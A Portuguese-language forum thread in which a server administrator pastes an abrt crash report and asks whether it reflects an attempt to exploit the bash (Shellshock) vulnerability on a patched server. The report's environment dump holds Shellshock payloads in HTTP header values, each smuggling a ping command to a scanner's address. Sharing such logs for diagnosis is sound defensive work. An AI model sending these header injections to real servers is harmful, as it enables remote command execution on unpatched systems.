Resultados 1 a 2 de 2
  1. #1
    Aspirante a Evangelist
    Data de Ingresso
    Nov 2010
    Posts
    441

    abrt full crash report

    Na noite de ontem recebi alguns erros do meu servidor.
    Alguém sabe do que é?
    Parece que tentaram explorar a vulnerabilidade do bash no servidor, mas o servidor está com a falha corrigida.

    abrt_version: 2.0.8
    cmdline: /bin/sh -c '/usr/share/ilabs_antimalware/firewall/checkdenied.sh 209.126.230.72'
    executable: /bin/bash
    kernel: 2.6.32-379.22.1.lve1.2.14.el6.x86_64
    last_occurrence: 1411608848
    pid: 423470
    pwd: /
    time: Wed 24 Sep 2014 10:34:08 PM BRT
    uid: 99
    username: nobody

    sosreport.tar.xz: Binary file, 5626524 bytes

    cgroup:
    :2:cpuacct,cpu,cpuset,name=fairsched:/0
    :1:blkio,name=beancounter:/

    environ:
    :UNIQUE_ID=VCNxEEWiUroABmwWGj4AAAAI
    :GATEWAY_INTERFACE=CGI/1.1
    :SERVER_PROTOCOL=HTTP/1.0
    :REQUEST_METHOD=GET
    :QUERY_STRING=
    :REQUEST_URI=/
    :SCRIPT_NAME=/
    :'HTTP_USER_AGENT=shellshock-scan (http://blog.erratasec.com/2014/09/ba...-internet.html)'
    :HTTP_ACCEPT=*/*
    :HTTP_COOKIE
    :'() { :; }; ping -c 17 209.126.230.74'
    :'HTTP_HOST=() { :; }; ping -c 23 209.126.230.74'
    :'HTTP_REFERER=() { :; }; ping -c 11 209.126.230.74'
    :PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin
    :SERVER_SIGNATURE=
    :SERVER_SOFTWARE=Apache
    :'SERVER_NAME=() { :; }; ping -c 23 209.126.230.74'
    :SERVER_ADDR=192.168.0.1
    :SERVER_PORT=80
    :REMOTE_ADDR=209.126.230.72
    OCUMENT_ROOT=/usr/local/apache/htdocs
    :SERVER_ADMIN=abuse@xxx.com.br
    :SCRIPT_FILENAME=
    :REMOTE_PORT=57655
    :PATH_TRANSLATED=/usr/share/ilabs_antimalware/firewall/checkdenied.sh
    :REDIRECT_STATUS=302

  2. #2
    Aspirante a Evangelist
    Data de Ingresso
    Nov 2010
    Posts
    441
    Não deu pra colocar o restante no mesmo post.

    limits:
    :Limit Soft Limit Hard Limit Units
    :Max cpu time unlimited unlimited seconds
    :Max file size unlimited unlimited bytes
    :Max data size unlimited unlimited bytes
    :Max stack size 8388608 8388608 bytes
    :Max core file size 0 0 bytes
    :Max resident set unlimited unlimited bytes
    :Max processes 14335 14335 processes
    :Max open files 16384 16384 files
    :Max locked memory 65536 65536 bytes
    :Max address space unlimited unlimited bytes
    :Max file locks unlimited unlimited locks
    :Max pending signals 62444 62444 signals
    :Max msgqueue size 819200 819200 bytes
    :Max nice priority 0 0
    :Max realtime priority 0 0
    :Max realtime timeout unlimited unlimited us

    maps:
    :00400000-004d4000 r-xp 00000000 fd:01 27000902 /bin/bash
    :006d3000-006dd000 rw-p 000d3000 fd:01 27000902 /bin/bash
    :006dd000-006e2000 rw-p 00000000 00:00 0
    :008dc000-008e5000 rw-p 000dc000 fd:01 27000902 /bin/bash
    :013cd000-013ee000 rw-p 00000000 00:00 0 [heap]
    :3ec2e00000-3ec2e20000 r-xp 00000000 fd:01 25165850 /lib64/ld-2.12.so
    :3ec301f000-3ec3020000 r--p 0001f000 fd:01 25165850 /lib64/ld-2.12.so
    :3ec3020000-3ec3021000 rw-p 00020000 fd:01 25165850 /lib64/ld-2.12.so
    :3ec3021000-3ec3022000 rw-p 00000000 00:00 0
    :3ec3200000-3ec338a000 r-xp 00000000 fd:01 25165891 /lib64/libc-2.12.so
    :3ec338a000-3ec358a000 ---p 0018a000 fd:01 25165891 /lib64/libc-2.12.so
    :3ec358a000-3ec358e000 r--p 0018a000 fd:01 25165891 /lib64/libc-2.12.so
    :3ec358e000-3ec358f000 rw-p 0018e000 fd:01 25165891 /lib64/libc-2.12.so
    :3ec358f000-3ec3594000 rw-p 00000000 00:00 0
    :3ec3a00000-3ec3a02000 r-xp 00000000 fd:01 25165961 /lib64/libdl-2.12.so
    :3ec3a02000-3ec3c02000 ---p 00002000 fd:01 25165961 /lib64/libdl-2.12.so
    :3ec3c02000-3ec3c03000 r--p 00002000 fd:01 25165961 /lib64/libdl-2.12.so
    :3ec3c03000-3ec3c04000 rw-p 00003000 fd:01 25165961 /lib64/libdl-2.12.so
    :3ec4e00000-3ec4e1d000 r-xp 00000000 fd:01 25166429 /lib64/libtinfo.so.5.7
    :3ec4e1d000-3ec501d000 ---p 0001d000 fd:01 25166429 /lib64/libtinfo.so.5.7
    :3ec501d000-3ec5021000 rw-p 0001d000 fd:01 25166429 /lib64/libtinfo.so.5.7
    :7f3510dfe000-7f3510e01000 rw-p 00000000 00:00 0
    :7f3510e0d000-7f3510e0e000 rw-p 00000000 00:00 0
    :7fffb3df6000-7fffb3e0b000 rw-p 00000000 00:00 0 [stack]
    :7fffb3efc000-7fffb3efe000 r-xp 00000000 00:00 0 [vdso]
    :ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

    open_fds:
    :0:/dev/null
    os: 0
    :flags: 0100000
    :1ipe:[4060249325]
    os: 0
    :flags: 01
    :2:/usr/local/apache/logs/error_log
    os: 73098853
    :flags: 02102001

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •